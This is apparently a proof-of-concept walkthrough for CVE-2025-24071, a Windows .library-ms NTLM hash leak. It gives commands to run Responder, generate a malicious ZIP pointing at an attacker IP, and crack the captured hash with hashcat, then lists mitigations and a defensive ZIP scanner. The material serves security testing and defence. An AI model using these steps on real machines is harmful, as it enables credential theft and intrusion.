- Triggers automatic SMB authentication to an attacker-controlled share.
- No interaction required — Windows Explorer initiates this NTLM authentication automatically.
- Results in NTLMv2 hash leakage (information disclosure).
- Affects all versions of Windows 10 and 11, especially Windows 11 23H2.

Install Responder

```bash
sudo apt update && sudo apt install responder -y
```

Start Responder

```bash
sudo responder -I eth0
```

Install required Python module

```bash
pip install colorama
```

Run the script

```bash
python3 CVE-2025-24071.py -i <attacker_ip> -n testpayload -o ./output --keep
```

This will generate `testpayload.library-ms` and `testpayload.zip`.

Transfer testpayload.zip to the Windows 11 test machine. Extract the ZIP using Windows File Explorer. This triggers Windows to try accessing the SMB path, leaking the NTLM hash.

```bash
responder -I eth0
```

Create a hash.txt file

```
victim::DOMAIN:1122334455667788:11223344556677889900aabbccddeeff:01010000000000000090d5d00f3
```

Most common wordlist: rockyou.txt

```bash
hashcat -m 5600 -a 0 -o cracked.txt hash.txt /usr/share/wordlists/rockyou.txt
```

- Block outbound SMB (TCP 445) at firewalls.
- Disable automatic authentication to untrusted SMB shares (group policy).
- Monitor for .library-ms file extraction and SMB connections.
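
One way to act on the last item before a user extracts anything is to scan inbound ZIP archives for `.library-ms` members that reference a remote host. This is an added example, not part of the original PoC; the function names, the size cap and the sample archive (a constructed stand-in using a TEST-NET address, not a valid library file) are assumptions.

```python
import io
import re
import zipfile

MAX_MEMBER_BYTES = 1_000_000  # assumed cap; larger members are flagged, not read

# UNC path (\\host\share...) or file://host/... URL, i.e. a reference to a remote host
REMOTE_REF = re.compile(r'\\\\[\w.-]+\\[^\s<>"]+|file://[\w.-]+/[^\s<>"]+', re.I)


def decode(data: bytes) -> str:
    """Decode UTF-16 (detected by BOM) or UTF-8 so the regex sees text either way."""
    if data[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return data.decode("utf-16", errors="replace")
    return data.decode("utf-8-sig", errors="replace")


def scan_zip(source) -> list[tuple[str, str]]:
    """Return (member, remote reference) pairs for .library-ms members in a ZIP."""
    findings = []
    with zipfile.ZipFile(source) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".library-ms"):
                continue
            if info.file_size > MAX_MEMBER_BYTES:
                findings.append((info.filename, "<oversized, not inspected>"))
                continue
            text = decode(zf.read(info))
            findings += [(info.filename, m.group(0)) for m in REMOTE_REF.finditer(text)]
    return findings


def build_sample(encoding: str = "utf-8") -> bytes:
    """Constructed test archive; the member is a stand-in, not a valid library file."""
    body = "<constructed-sample>\\\\192.0.2.10\\share</constructed-sample>"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("readme.txt", "nothing to see")
        zf.writestr("docs/Report.library-ms", body.encode(encoding))
    return buf.getvalue()


if __name__ == "__main__":
    for name, ref in scan_zip(io.BytesIO(build_sample())):
        print(f"ALERT {name} -> {ref}")
```

A hit at a mail or web gateway is a reason to quarantine the archive; environments that distribute libraries pointing at sanctioned file servers would need an allow-list on the host part.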